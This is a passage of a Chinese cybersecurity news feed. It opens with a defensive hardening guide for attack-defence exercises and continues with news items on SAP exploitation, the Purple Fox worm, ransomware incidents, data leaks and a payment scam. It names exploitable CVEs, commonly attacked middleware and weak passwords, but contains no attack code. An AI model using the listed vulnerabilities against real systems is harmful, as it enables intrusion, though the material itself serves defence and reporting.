敏感信息泄露探测;

源代码泄露探测。

互联网暴露面缩减方式:

从代码层修复漏扫及渗透发现的问题;

关闭测试系统对外服务端口映射;

关闭直接对外服务的高危端口及其映射地址;

所有对外业务都该经过安全防护设备(防火墙、WAF、入侵检测、防毒墙等);

将VPN设备系统升级到最新版本,设置后台管理页面访问控制权限(仅允许个别IP访问),设置多因素登录VPN;

对于无法从代码层修复的系统应直接关闭系统或关闭映射,若实在无法关闭的话,需要将其与其它系统单独隔离出来;

对于公有云上的资产应该设置安全组,接入云安全防护(如云防火墙)、软件安全防护软件等。

四、补丁修复

根据2020年的HVV风险总结来看,内网的隐患占到47%,排名第一,其大多数表现为内网大批漏洞、补丁、弱口令不修复、内网缺乏隔离产品等。在这里我们列举一些红队利用频率较高的漏洞:

中间件的反序列化漏洞:Jboss、Weblogic、shiro;

远程执行代码漏洞:Struts2系列漏洞、Jekins任意读取、ElasticSearch任意文件读取、Glassfish;

未授权访问:RabbitMQ、Redis;

操作系统:windows 各种远程执行代码漏洞;

后台弱口令和未授权访问;

应用系统的任意文件上传Getshell;

五、中间件及第三方组件安全

常用的中间件及第三方组件是最容易被忽视和被利用的一个环节。常见的中间件及第三方组件有:redis、activemq、memcache、rabbitmq、AppServ、Xampp、宝塔、PhpStudy、Dedecms、thinkphp 5.x、phpcms、ecshop、Metinfo、discuz、帝国cms、wordpress、joomla、drupal等。

这些中间件及第三方组件主要问题:

使用默认密码或直接未授权访问;

使用的老旧版本存在大量已知漏洞,如:ThinkPHP3.x注入漏洞、ThinkPHP6 任意文件操作漏洞、CVE-2020-13920 Apache ActiveMQ 远程代码执行漏洞、wordpress File-manager任意文件上传、CVE-2020-13933-Apache Shiro 权限绕过漏洞、PHPCMS v9全版本前台 RCE、PHPCMS v9全版本前台RCE、PHPCMS V9 存在RCE漏洞、CVE-2020-25540 Thinkadmin v6 任意文件读取漏洞;

后台管理页面直接对外提供服务。

加固建议:

升级到官方最新版本;

修改默认密码或空密码;

限制访问这些资源。

六、中应用系统

应用系统最主要的风险来源于应用系统或软件的使用过程,尤其在网络环境下,其主要包括:

应用系统安全性;

未授权访问和改变数据;

未授权远程访问;

不精确的信息;

错误或虚假的信息输入;

授权的终端用户滥用;

不完整的处理;

重复数据处理;

不及时处理;

通信系统失败;

不充分的测试。

加固建议:

根据应用系统业务重要性进行分级处理;

对所有应用系统进行漏洞扫描并整改;

对重要系统进行渗透测试并整改;

重要系统暂时无法修改进行限制访问;

非重要系统暂时无法修复建议暂时下线。

七、弱口令

根据数据分析显示,所有成功突破外网边界的手段中利用弱口令进入的比例高达70%。口令是网络信息安全基础中的基础,直接决定了系统和信息的安全性,当弱口令安全得不到保障时,则黑客可以通过暴力破解等手段,轻易地进入后台或者系统中进行数据窃取。据统计,常见的弱口令top10有:123456、12345、123456789、Password、iloveyou、princess、rockyou、1234567、12345678、abc123。

弱口令的修复主要从两方面:一是技术手段、二是行政手段。

技术性修复弱口令:

1、密码长度应不小于8位长度;

2、密码复杂度要有大写字母、小写字母、数字、特殊字符至少三种组合;

3、定期更换密码,三级系统不超过30天,二级系统不超过90天,到期后下次登录强制修改密码;

4、强制密码历史,最近10次使用的密码不可重复使用,且密码中重复的字符不应超过5位;

5、建立弱口令库(收集互联网上公开的密码库、弱口令TOP1000字典等),新建密码时对弱口令库中的密码进行匹配,若匹配上了则无法使用该口令;

6、登陆界面设置验证码,验证码应进行扭曲、变形、干扰线条、干扰背景色、变换字体等处理,避免被OCR识别。验证码使用一次后失效,且应由后端服务器生成,避免被抓包绕过或重放利用。

行政性修复弱口令:

1、加强人员安全意识培训;

2、通知统一修改一次密码。

八、网络设备

目前各个单位的网络系统都有较大的规模,且结构复杂,组网方式随意性强,这就导致了网络中网络设备、安全设备缺少有效的策略控制。不规范的策略配置可能会导致设备故障配置丢失、非法外联、非法内联、东西向的互联网渗透、南北向的内网横向渗透、设备“0 day”漏洞等风险。

加固建议:

1、应绘制与当前运行情况相符的网络拓扑结构图,并维护网络中的设备资产清单,详细记录设备连接情况、接口信息、管理密码等信息;

2、应定期对所有网络设备、安全设备的配置进行备份,并测试备份文件的有效性,备份周期建议不超过30天;

3、由于telnet协议是通过明文的方式进行数据传输的,黑客可以通过arp攻击、抓包等方式获得设备的密码,如非特殊情况应关闭所有网络设备、安全设备的telnet服务,即禁用23端口,采用更安全的SSH远程管理方式;

4、所有网络设备(含物联网设备)、安全设备应启用管理主机,只允许可信的IP访问设备的运维端口(22、80、443等端口),如视频会议后台、摄像头登陆界面、设备登录界面等;

5、网络设备、安全设备应启用密码复杂度、登录失败次数锁定以及会话超时退出等功能,且应采用双因子认证的方式(采用动态口令、数字证书、生物技术和设备指纹等两种或两种以上组合的鉴别技术对用户身份进行鉴别)进行登录;

6、所有网络设备、安全设备应定期排查策略的有效性,并按照最小化原则进行权限划分;

7、所有接入网络的网络设备、安全设备应进行IP/MAC地址绑定,保证设备的可靠运行;

8、优化边界防火墙的访问规则,限制除业务必须外联的服务器以外的设备访问互联网,禁止服务主动外联,如果发现主动外联的IP地址,应立即报警追溯,特殊服务器(DNS服务器、补丁服务器等)需主动外联的除外;

9、防火墙应删除多余或无效的访问控制规则,优化访问控制列表,并保证访问控制规则数量最小化,在访问控制列表第一条创建拒绝高风险端口(135、137、138、139、445等勒索病毒常用端口)通信规则,默认情况下除允许通信外受控接口拒绝所有通信;

10、边界防火墙应删除多余或无效的NAT规则,只保留业务必须的端口映射至外网,严禁将高风险端口(运维端口、数据库端口等)映射至外网,如果需要远程管理,尽可能使用VPN、专线、4A接入等手段,保证接入管理的安全性;

11、建议在网络边界、重要网络节点,对重要用户的行为和重要安全事件进行日志审计,便于对相关事件或行为进行追溯,且审计记录应保存180天以上;

12、安全设备的规则库版本应升级至最新,才能及时有效地发现新型攻击并阻断,保证业务安全;

13、网络设备、安全设备系统版本应升级至最新,通过攻防演练已经有较多安全设备出现“0 day”漏洞,且漏洞利用难度低,危害大。

九、网络分区分域

由于资金、网络规模、管理方便等历史原因,网络安全分区总是不那么合理。往往一个区域混杂多种流量,各个流量相互影响,容易由于某个业务遭受攻击连带影响到其他业务。当规模不断扩大时,管理人员光是梳理清楚流量都要耗费大量的精力,甚至有时候由于人员变动,没有人分得清楚流量间的关系,给后续的运维带来非常大的成本。一旦发生故障将要耗费大量的时间排错。

根据网络安全分区防护的要求,结合应用系统服务器之间服务层次关系的分析,引出了新的层次型网络安全区域模型。该模型用垂直分层、水平分区的设计思想系统阐述了这一新的网络安全区域的划分方法。

在划分安全区域时,需要明确几个安全区域相关的定义,以免模糊他们之间的概念,造成区域划分完之后,依然逻辑不清晰,安全策略无法明确,立体的纵深防御体系也无法建立。

一般在安全区域划分时,需要明确如下常用的定义:

( 1 ) 物理网络区域

物理网络区域是指数据网中,依照在相同的物理位置定义的网络区域,通常如办公区域,远程办公室区域,楼层交换区域等。

( 2 ) 网络功能区域

功能区域是指以功能为标准,划分的逻辑网络功能区域,如互联网区域,生产网区域,办公网区域等。

( 3 ) 网络安全区域

网络安全区域是指网络系统内具有相同安全要求、达到相同安全防护等级的区域。同一安全区域一般要求有统一的安全管理组织和安全防护体系及策略,不同的安全区域的互访需要有相应得边界安全策略。

( 4 ) 网络安全层次

根据层次分析方法,将网络安全区域划分成几个不同安全等级的层次,同一层次包含若干个安全等级相同的区域,同层安全区域之间相互逻辑或物理隔离。

尽管不同企业对安全区域的设计可能理解不尽相同,但还是有一般的安全区域设计原则可供参考。常规的网络划分包括DMZ区、互联网接入区、内网办公区、服务器区、安全管理中心。每个区域之间利用防火墙、网闸、ACL、VLAN实施逻辑、物理的隔离,形成一个垂直分层、水平分区的网络安全区域模式。

当整个网络环境因历史原因一时无法采用物理方法划分到位时,可采用微隔离产品进行软隔离,从而达到相对安全状态。微隔离产品主要是对同一安全域内服务器按一定规律进行最小划分组,实现组内相对自由、组间严格管控,最大层面上缩减内网暴露面提升内网安全。

十、办公网络安全

办公网络存在主要存在以下几个风险:恶意攻击和木马病毒。

加固建议:

1、及时修复漏洞;

2、关闭无用的互联网出入口;

3、及时更新防火墙、杀毒软件病毒库、规则库;

4、搭建统一桌面管理系统、网络防病毒系统并要求所有办公电脑安装两个系统客户端,并由各部门主管落实安装情况或者开启相关系统准入功能。将所有办公电脑安装完成后,可由桌面管理系统和防病毒系统进行配合管理;

5、开启对应办公网段桌面准入功能,凡是所有接入办公网段均需要安装桌面管理系统和防病毒系统;

6、桌管及防病毒系统后台进行IP限制;

7、对办公电脑进行分组下发策略,如无特殊情况限制所有人员使用USB接口;

8、下发定时体检定时扫描策略,每天中午分组对所有办公下发定时体现、扫描策略,并根据体检、扫描结果对问题电脑进行整改。

十一、WIFI网络安全

WIFI网络主要存在以下几个风险:被盗用的风险、被窃听的风险、被控制的风险、钓鱼攻击风险。

加固建议:

1、隐藏服务标识;

2、用户认证设备;

3、提高保密性能;

4、检查办公环境内存在多少WIFI信号,是否存在未知的信号,加密类型是否为弱加密;

5、检查是否存在空口令的WIFI信号;

6、使用万能ys尝试连接,对连接成功的需要查看信号源、口令强度以及是否可以访问内网;

7、连接成功的WIFI尝试访问管理界面,查看是否存在弱口令;

8、严禁私拉WIFI,所有的WIFI信号都需要严格把控,做好设备准入和访问控制(无线准入、无线区域的防火墙),如果没有准入的话,要通过绑定ip/mac来限定,设备也要设置强口令。

十二、安全产品自身安全

安全产品自身存在的风险主要是在安全产品部署和运维过程中,尤其在复杂网络环境下,因运维操作而产生的风险,主要包括:

1、可能存在安全产品老化或产品版本未更新等风险。

2、所有类型的安全产品,可能存在运维配置风险,例如:弱口令,无登录次数限制,无多因子认证,未定期更新系统版本和相关规则库。

3、对于相关的网关类安全产品,可能存在全通策略等不严谨策略的风险,不定期分析和加固策略的风险。

4、对于审计监控类型的安全产品,可能存在不定期镜像流量异常情况或上传日志文件有效性完整性等风险。

5、对于安全产品的管控方面,可能存在安全产品没有开启带外管理,或纳入统一的安管平台,无法有效的管控等风险。

加固建议:

1、用户身份鉴别:在用户请求访问系统资源时至少进行一次身份鉴别。

2、访问限制:有且只有授权用户才能访问分配给该用户的资源;用户不能访问没有分配给该用户的资源。

3、用户分级管理功能:安全防护产品应具有多用户分级管理功能,应可建立具有不同权限的用户,并可以针对不同客户设定对资源的不同访问权限。

4、管理员身份鉴别:应保证只有授权管理员和可信主机才有权使用产品的管理功能,对授权管理员和可信主机应进行身份鉴别。

5、管理员权限:定期队管理员属性进行修改(更改口令等);并且制定和修改访问控制安全策略。

6、身份鉴别时效和失败处理:当用户的失败登录次数超过允许的尝试鉴别次数时,应能加以检测,并应该阻止该用户的进一步登录尝试,直至授权管理员恢复对该用户的鉴别能力。

7、安全防护产品在部署和安置的位置要尤为注意,需要进行单独分区分域管理,避免安全产品出现0day漏洞导致攻击人员直接进入业务网络进行破坏或者其他进一步操作。

9999.jpg

]]>
特斯拉车内摄像头事件登热搜 工信部发文称智能网联汽车不得泄露敏感信息 Thu, 22 Apr 2021 23:10:26 +0800        日前,我们从工信部官网了解到,为加强道路机动车辆生产企业及产品准入管理,推动智能网联汽车产业健康有序发展,工信部装备工业一司组织编制了《智能网联汽车生产企业及产品准入管理指南(试行)》(征求意见稿)(以下简称《意见稿》)。

意见提到,智能网联汽车生产企业应依法收集、使用和保护个人信息,实施数据分类分级管理,制定重要数据目录,不得泄露涉及国家安全的敏感信息。在中华人民共和国境内运营中收集和产生的个人信息和重要数据应当按照有关规定在境内存储。因业务需要,确需向境外提供的,应向行业主管部门报备。

此外,智能网联汽车产品应明确驾驶自动化功能及其设计运行条件。设计运行条件应包括设计运行范围、车辆状态、驾乘人员状态及其他必要条件;设计运行范围应包括但不限于道路、交通、电磁环境、天气、光照等。

值得注意的是,特斯拉近日因“车内摄像头”登上微博热搜,该视频是黑客提取到的特斯拉车内摄像头拍摄的白天画面。

据了解,该视频画面引起了网友广泛的讨论,但特斯拉官方表示:目前该驾驶室摄像头在北美以外的市场并没有激活。

此外,新华社对特斯拉车内摄像头事件也做出回应:“车内隐私不是你想采就采。”

9999.jpg

]]>
小心!关键任务SAP应用程序受到攻击 Thu, 22 Apr 2021 23:10:26 +0800

安装于企业内部的SAP系统(企业资源规划系统)在发布更新后的72小时之内,遭到了黑客的密集攻击。黑客们利用还未及时打补丁的漏洞,对企业和政府部门发起攻击。

1617780005_606d5d250dd4fb80bf6e0.png!small?1617780006527

全球有40多万家企业和92%的福布斯全球2000强企业使用SAP的企业应用程序进行供应链管理(SCM)、企业资源规划(ERP)、产品生命周期管理(PLM)和客户关系管理(CRM)。

目前,SAP公司和云安全公司Onapsis已经对此发出了警告,并且与网络安全和基础设施安全机构(CISA)以及德国网络安全机构BSI发起了合作,来督促SAP的客户及时部署补丁,并检查他们的环境中是否存在不安全的应用程序。

被针对的SAP漏洞

Onapsis和SAP合作的威胁情报显示,他们目前没有发现有客户已经受到此次恶意活动的攻击而造成损失。但是,报告表示SAP客户的环境中仍然有不安全的应用程序,并通过本应在几年前就被打补丁的攻击载体将组织暴露在渗透企图中。

自2020年中期,Onapsis开始记录针对未打补丁的SAP应用的利用尝试以来,该公司的研究人员发现 "在2020年6月至2021年3月期间,来自近20个国家的黑客发起了1500次攻击尝试,成功利用了300次"。

这些攻击背后的黑客利用了SAP应用程序中的多个安全漏洞和不安全配置,试图入侵目标系统。

此外,他们中的一些黑客,同时在攻击中利用多个漏洞进行串联,以 "最大限度地扩大影响和潜在的破坏"。

1617780022_606d5d36b2270c9c96fea.png!small?1617780023997

针对脆弱的SAP应用程序的攻击(SAP/Onapsis)

Onapsis表示,他们观察到黑客可以利用技术来对不安全的SAP应用程序进行完全控制,并且可以绕过常见的安全性和合规性控制,来使攻击者能够通过部署勒索软件或停止企业系统运营来窃取敏感数据、执行财务欺诈或破坏关键任务业务流程。

威胁报告中公布的漏洞和攻击方式如下:

1.针对不安全的高权限SAP用户账户进行蛮力攻击。

2.CVE-2020-6287(又名RECON):一个可远程利用的预认证漏洞,能够使未经认证的攻击者接管脆弱的SAP系统。

3.CVE-2020-6207:超危预认证漏洞,可能导致进攻者接管未打补丁的SAP系统。(漏洞已于2021年1月发布在Github上)。

4.CVE-2018-2380:使黑客能够升级权限并执行操作系统命令,从而获得对数据库的访问权,并在网络中横向移动。

5.CVE-2016-95:攻击者可以利用这个漏洞触发拒绝服务(DoS)状态,并获得对敏感信息的未授权访问。

6.CVE-2016-3976:远程攻击者可以利用它来升级权限,并通过目录遍历序列读取任意文件,从而导致未经授权的信息泄露。

7.CVE-2010-5326:允许未经授权的黑客执行操作系统命令,并访问SAP应用程序和连接的数据库,从而获得对SAP业务信息和流程的完全和未经审计的控制。

根据CISA发布的警报,受到这些攻击的组织可能会产生以下影响:

敏感数据被盗

金融欺诈

关键任务业务流程中断

勒索软件攻击

停止所有操作

为脆弱的SAP系统及时打上补丁是所有企业组织目前的首要任务。Onapsis还指出,攻击者在更新发布后的72小时之内就开始瞄准关键的SAP漏洞。

暴露和未打补丁的SAP应用程序在不到3小时就会被攻破。

1617780067_606d5d63370b0df10452a.png!small?1617780068439

缓解威胁的措施

这些被滥用的漏洞只影响企业内部的部署,包括那些在他们自己的数据中心、管理的主机托管环境或客户维护的云基础设施。SAP维护的云解决方案不受这些漏洞的影响。

为了减轻风险,SAP客户可采取的行动如下:、

1.立即对暴露在上述漏洞中的SAP应用程序以及未及时安装补丁的SAP应用程序进行入侵评估。优先考虑连网的SAP应用程序。

2.立即评估SAP环境中所有应用程序的风险,并立即应用相关SAP安全补丁和安全配置。

3.立即评估SAP应用程序是否存在配置错误或未经授权的高权限用户,并对有风险的应用程序进行入侵评估。

4.如果经过评估的SAP应用程序目前已经暴露,并且不能及时应用缓解措施,则应部署补偿控制并监控活动,以检测任何潜在的威胁活动,直到实施缓解措施。

9999.jpg

]]>
Purple Fox恶意软件正大肆攻击Windows设备 Thu, 22 Apr 2021 23:10:26 +0800

关于Purple Fox

Purple Fox是一款功能强大的恶意软件,之前版本的Purple Fox主要通过漏洞利用工具包和网络钓鱼电子邮件来进行传播,但新版本的Purple Fox新增了一个蠕虫模块,这将允许Purple Fox在持续攻击过程中扫描并感染连接了外网的Windows系统。

当前版本的Purple Fox具备Rootkit和后门功能,自2018年该恶意软件首次被发现至今,它已经成功感染了至少3万台设备了,而且攻击者还会利用Purple Fox(作为下载器使用)在目标设备上下载、安装和部署其他的恶意软件。

Purple Fox的漏洞利用工具包可以针对Windows系统进行攻击,并在目标设备上利用内存崩溃漏洞和权限提升漏洞,最终通过Web浏览器来感染Windows用户。

Guardicore实验室安全研究人员Amit Serper和Ophir Harpaz表示,从2020年5月开始,Purple Fox攻击活动愈发频繁,攻击活动总数已经达到了9万次,感染成功率增加了600%。

联网的Windows设备成为攻击“重灾区”

根据Guardicore全球传感器网络(GGSN)收集到的遥测数据显示,从去年年底开始,这款恶意软件已经能够执行主动端口扫描和自动攻击尝试了。Purple Fox执行联网设备扫描并发现了暴露在外网中的Windows设备之后,它会使用新添加的蠕虫模块并利用SMB密码爆破攻击来实施感染。

根据Guardicore实验室的报告,到目前为止,Purple Fox已经在一个大规模僵尸网络上部署了恶意软件删除程序和额外的模块,而这个僵尸网络总共由近2000台受到攻击的服务器组成。

这个僵尸网络中的设备包括运行IIS 7.5和Microsoft FTP的Windows Server计算机,以及运行Microsoft RPC、Microsoft Server SQL Server 2008 R2和Microsoft HTTPAPI httpd 2.0的服务器,以及Microsoft Terminal Service。

虽然Purple Fox新增的这种类似蠕虫的行为允许它利用暴露在外网中Windows设备的SMB服务来对目标设备进行攻击,从而实现服务器感染,但它同时也在利用网络钓鱼活动和Web浏览器漏洞来部署其攻击Payload,这样也可以有效提升攻击的成功率。

Guardicore实验室安全研究人员Amit Serper和Ophir Harpaz说到:“在整个研究过程中,我们观察到了Purple Fox的一个基础设施似乎是由大量易受攻击的服务器所组成的,这些服务器托管着恶意软件的初始Payload,而所有被感染的设备都成为了整个僵尸网络或与其他恶意软件活动有关的服务器基础设施中的其中一个节点。”

Purple Fox使用了开源Rootkit实现持久化感染

在重新启动受感染的设备并获得持久化感染之前,Purple Fox还会安装一个Rootkit模块,该模块将使用开源的Rootkit来隐藏在受感染系统上创建的已删除文件和文件夹或Windows注册表项。

在部署Rootkit并重新启动设备后,恶意软件将重命名其DLL Payload以匹配Windows系统DLL,并将其配置为在系统启动时启动。

一旦恶意软件在系统启动时被执行,每个被感染的系统随后都会表现出类似蠕虫的行为,它们不断扫描互联网寻找其他目标,然后试图攻击它们并将它们添加到僵尸网络中。

Guardicore实验室的安全人员总结称:“当目标设备响应了通过端口445发送的SMB探测消息之后,它将会尝试通过爆破用户名和密码或尝试建立空会话的方式进行SMB认证。如果身份验证成功,恶意软件将会创建一个名称跟正则式AC0[0-9]{1}相匹配名称的服务,比如说AC01、AC02或AC05。随后,这个服务会将众多HTTP服务器中的MSI安装包下载下来,并完成设备循环感染。”

9999.jpg

]]>
加州大学遭勒索软件攻击,隐私数据大规模泄漏 Thu, 22 Apr 2021 23:10:26 +0800 近日,加利福尼亚大学警告其学生和教职员工,勒索软件团伙可能已经窃取并发布了他们的个人数据以及全国数百所其他学校、政府机构和公司的个人数据。


640.webp (7).jpg

该大学在周三的一份声明中说,网络安全攻击针对的是第三方供应商Accellion中的一个漏洞,该漏洞用于安全传输文件。

该大学说:“我们知道这次攻击背后的人已经发布了泄漏的个人信息的屏幕截图。”

声明还说,一个或多个黑客还一直在发送大量恐吓电子邮件,威胁如不缴纳赎金就要发布数据。

在上周五的更新中,加州大学表示,网络攻击影响了大约300个组织,“包括大学、政府机构和私人公司。”

其他学校,包括斯坦福大学医学院和纽约叶史瓦大学,都报告说,学生和员工的社会安全号码和财务信息被盗,有些已经在网上发布。

据悉,这些数据泄漏于12月和1月之间,黑客利用了已有20年历史的Accellion文件传输服务中的漏洞。但是,一些组织表示,他们只是在最近才意识到数据泄露事件的发生。

据《巴尔的摩太阳报》报道,巴尔的摩马里兰大学的工作人员和学生的私人信息已于上周在线发布。该校表示,一个名为Clop的黑客组织于12月获得了Accellion的访问权。

科罗拉多大学和迈阿密大学报告说,文件是在一月份访问的,其中包括个人数据以及一些健康研究和研究数据。

华盛顿州审计署上个月报告说,有关近150万失业申请人的信息被盗。

Accellion在三月份发布了一份声明,称已关闭“所有已知”漏洞,未发现任何新漏洞。

近几个月来,勒索软件大规模攻击多家企业和组织,并收割巨额赎金。

在另外一次单独的勒索软件攻击中,美国最大学区之一布劳沃德县公立学校的计算机系统遭到犯罪团伙的黑客攻击,该犯罪团伙对学区的数据进行加密并要求4000万美元的赎金,否则它将删除文件并将学生和员工的个人信息在线发布。

公立学区一直是勒索软件攻击的目标。网络安全公司Emsisoft的分析师布雷特·卡洛(Brett Callow)表示,总体而言,勒索软件攻击在2020年中断了1,681所学校、学院和大学的学习,今年到目前为止至少发生了544例。

根据网络安全公司Palo Alto Networks的数据,支付给黑客团伙的平均赎金几乎翻了三倍,从2019年的115,000美元增加到2020年的312,000美元。

9999.jpg

]]>
一黑客论坛公开泄露超5亿条Facebook账户记录 Thu, 22 Apr 2021 23:10:26 +0800        一个黑客论坛公布了超过5亿Facebook用户的个人数据缓存,这是迄今为止该社交网络在数据保护方面的最大失误之一。该数据库包含了全球数亿Facebook用户的个人数据,这些数据在本周六被发现,有可能被用于各种犯罪,包括其他黑客和社交工程。

网络犯罪研究公司Hudson Rock首席技术官Alon Gal建议,这些数据包括用户的全名,以及Facebook ID、地点、出生日期、个人简历、电话号码和电子邮件地址。安全人员将缓存中的部分数据与Facebook的密码重置功能进行对比验证,发现数据是真实的。

_W~Q3E{J}JG50KMK(H1P[SY.png

数据中列出了超过5.33亿用户,覆盖106个国家。其中超过3200万条记录是美国用户,1100万条记录来自英国,600万条记录来自印度。

"这么大的数据库,包含了很多Facebook用户的电话号码等私人信息,肯定会有不良分子利用这些数据。"加尔说。

在可能会让受影响的Facebook用户感到沮丧的情况下,Gal在1月份首次发现了一个黑客论坛的用户为一个自动机器人做广告,声称可以爬取数百万用户的电话号码。该机器人收集的数据集似乎是免费发布到论坛上的,使得任何人都可以免费获取。

Gal认为,现阶段除了通知用户警惕利用其个人数据的钓鱼计划或欺诈行为外,既然数据已经流传开来,Facebook作为第一方实际上也没有什么办法应对。

EyDBl6zXMAAyDNU.pngEyDBlHSXEAARm8p.pngEyDBkFBXIAAYTz9.png

9999.jpg



]]>
勒索凶猛!澳大利亚最大电视台之一停播超24小时 Thu, 22 Apr 2021 23:10:26 +0800 2021年4月1日,疑似国家支持的黑客团伙发动猛烈攻击,导致澳大利亚九号电视台(Nine Network)停播超24个小时。这也成为澳大利亚有史以来最大规模的媒体事故。

640.webp (6).jpg

九号电视台是澳大利亚最大的电视网络之一,其周一早间在官方网站上披露,上周日遭受网络攻击,导致生产系统被迫下线。尽管部分节目已经开始复播,但九号电视台的新闻与时事频道仍处于攻击后的瘫痪状态。根据报道,在该公司处理善后工作期间,全体员工暂定无限期居家办公。

母公司九号娱乐的员工与公司文化总监Vanessa Morley在一封电子邮件中解释称,“我们的IT团队正在全天候工作,加紧恢复我们的生产系统。目前的问题主要影响到我们的电视播送与企业业务部门,出版与广播系统仍在正常运作。”而九号电视台在线新闻网站的最新报道提到,攻击方虽然确有使用勒索软件,但并未提出任何赎金条件。由此看来,对方很可能属于国家支持下的恶意团伙。

周一晚间,九号电视台原本计划播出关于俄罗斯总统普京使用毒药谋杀海外不同政见者的相关消息。但目前并无确凿证据将此次网络攻击与俄罗斯方面联系起来。就在九号电视台遭遇攻击的几小时之前,澳大利亚布里斯班国会大厦同样遭遇可疑勒索软件的入侵。为了迅速应对国会袭击案,现场技术人员立即切断了IT访问通道。根据报道,国会大厦自当地时间周六中午起经历30多个小时的服务中断。事后证明,此次攻击主要针对外部服务供应商。就在上周日晚,澳大利亚国会的工作人员还在WhatsApp上收到了关于网络钓鱼诈骗的警报提醒。

9999.jpg

]]>
印度移动支付服务商MobiKwik 350万用户信息在暗网泄露 Thu, 22 Apr 2021 23:10:26 +0800 3月30日,印度移动支付服务商MobiKwik可能已被黑客入侵,近350万客户的KYC(实名身份验证)信息遭泄露。尽管MobiKwik否认了该黑客入侵事件,但其他消息似乎已经证实了这一事实,因为已经有人在暗网论坛上列出了8.2 TB的KYC数据,售价1.5比特币(BTC)。

MobiKwik数据在暗网泄露

据悉,MobiKwik于2009年在印度古尔格拉姆(Gurugram)成立,该公司通过APP向用户提供支付服务和数字钱包服务。2016年,该公司开始向用户提供小额贷款,要求用户提交实名认证(KYC)信息。

互联网独立研究员拉贾哈里亚(Rajaharia)表示,黑客从MobiKwik窃取的KYC数据已经在暗网论坛上售卖,在卖方建立的专题页面上,买家可以通过电话号码或电子邮件ID搜索到指定的结果,这批数据一共8.2TB,买家只需支付1.5个比特币就能获得整个数据库的专有权,而且,已经有买家尝试抓取了9900万个用户KYC信息。

在暗网上,卖家还针对这批数据的设立了贷款规则,每条用户信息可以筹集价值$500-$1,000的印度卢比贷款。这可能使1.5BTC投资价值高达30亿美元。卖方声称他已经能够以该信息作为概念证明来获得贷款。

MobiKwik公司坚决予以否认

关于这一事件,MobiKwik公司在推特上坚决予以否认:“一个疯狂的所谓安全研究人员反复尝试提供伪造的文件,浪费了本公司和媒体的宝贵时间。我们进行了彻底调查,并未发现任何安全漏洞。我们的用户和公司数据是完全安全的。”但是,此答复并不能解释为什么暗网卖方声称数据源就是来自MobiKwik,同时,在暗网专题页面上看到的样本还包含MobiKwik QR码的图像。

“一个疯狂的所谓安全研究人员”说的就是独立研究员拉贾哈里亚(Rajaharia)。在较早前,拉贾哈里亚(Rajaharia)就在推特上披露,客户的KYC信息已从MobiKwik的服务器中泄露,但MobiKwik公司很快予以否认,并威胁拉贾哈里亚(Rajaharia)将提起诉讼,指控他没有充分的证据,这也是拉贾哈里亚(Rajaharia)突然曝光了暗网售卖事件的主要原因,而且该公司在2010年的确实发生过数据泄露事件。

如果这件事情被证实,这将是目前最大的用户KYC信息泄漏事件。当然,事件的真假,各说纷纭,但许多较小的攻击事件却在频繁发生。3月15日,黑客劫持了PancakeSwap和Cream Finance域名的DNS,试图访问这些站点的用户被定向到一个未知地址,并索要他们的钱包种子短语。2月初,另一名黑客从Cream Finance上成功窃取了3750万美元。

网安信安全建议

在数字货币高增长时期,尤其需要注重安全建设。但所有安全事故往往是一些工作疏忽造成,正所谓“千里之堤毁于蚁穴”。因此,网安信建议企业在实际工作中,务必做好以下三点:

1、制定严格的内部管理流程,对公司管理节点进行清晰的区域分割,对相关人员的权限进行分权管理,且随时根据公司的发展情况对管理节点进行定期更新维护。

2、时刻保持警惕,对公司所有操作日志和用户访问日志进行7*24小时监控,每天定期巡查,发现异常立即处理。

3、做好安全防护工作,定期对公司所用应用和服务器进行安全检测,或与靠谱的第三方服务公司合作,引入更先进的安全服务。

9999.jpg

]]>
《使命召唤:战区》作弊软件被发现含恶意软件 Thu, 22 Apr 2021 23:10:26 +0800       动视公司揭露了《使命召唤:战争地带》的一款作弊软件含有隐藏的恶意软件,旨在控制受害者的电脑,这可谓是因果报应。据Vice报道,动视的安全研究人员发现,在流行的作弊论坛上宣传的一款Warzone作弊软件包含的内容比表面上看到的更多。它偷偷地在设备上安装了一个dropper,这使得其他类型的恶意软件可以下载到计算机上。

恶意软件活动的目标之一是在受害者的电脑上安装矿机,在受害者不知情的情况下,利用游戏玩家的显卡来开采加密货币。动视指出,"正版 "作弊器工作所需的程序也让大多数恶意软件工具得以执行,比如绕过系统保护和升级权限。许多作弊器建议用户禁用他们的反病毒软件,以确保与系统的兼容性,从而使隐藏的恶意软件在作弊者没有被提醒的情况下感染PC。

虽然这种方法相当简单,但归根结底是一种社会工程技术,它利用目标(想要作弊的玩家)的意愿,自愿降低安全保护,并忽略运行潜在恶意软件的警告。《使命召唤:战争地带》在2020年8月时拥有7500万玩家。虽然现在这个数字低了很多,但作弊仍然是个大问题。动视自推出以来已经在全球范围内封禁了30万人,其中6万人在一天内被封。

9999.jpg



]]>
「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱 Thu, 22 Apr 2021 23:10:26 +0800 你有没有为了看小片片而一时冲动给某些奇奇怪怪的网站和APP充钱?你的家人会不会看到一毛五个的鸡蛋秒杀活动而失去理智?恭喜你,你全家都被最新的暗网黑产“暗雷”盯上了。

「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱


"暗雷"指的是那些来路不明的APP,经过底层代码修改之后,就变成了地雷:一点就炸。比如,你在这些APP里发起支付,界面显示只扣1块钱,就可以买到某网站的月费大会员。当你愉快地点下支付键的时候,你心态就炸了。因为你会收到的是扣款500的银行短信通知。当然存款没有500的同学可以不用担心,穷是你们最好的保护色。

本期内容,小池给大家介绍"暗雷"产业链。

一,不要以为你用的是微信支付宝等大厂的支付宝就安全,它骗的就是微信支付宝的钱;二,它有各种隐藏手段,无法被杀毒软件和支付软件的安全系统检测到,避无可避;三,它会自己找上门,不要以为你不去各种奇奇怪怪的网站就安全;四,它男女老少通吃,不要以为你是老司机,你家人就会安全。看完请一键三连,转发给你的亲友,好人一生平安。

事情的源起,是我有一个朋友,说他最近在微信的狼友群,就是狼人杀好友群,收到一个狼友发给他的直播APP链接。

在下载小软件免费学习了5分钟之后,这个APP突然弹出需要付费1元才能继续学习,我朋友本着花钱事小,耽误了学习事大的原则,不假思索就点击了支付。

「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱


紧接着神奇的事情发生了。在APP上显示1元钱的支付流程完毕后,我朋友发现支付宝实际消费500元的提示。本来是想免费观看,结果硬生生被骗了一套大宝剑的价格。小池为朋友打抱不平,决定卧底暗网群找出真相,结果发现了惊天大瓜。

「暗网新黑产」支付宝付款1元,实扣500!揭秘暗雷如何骗你钱


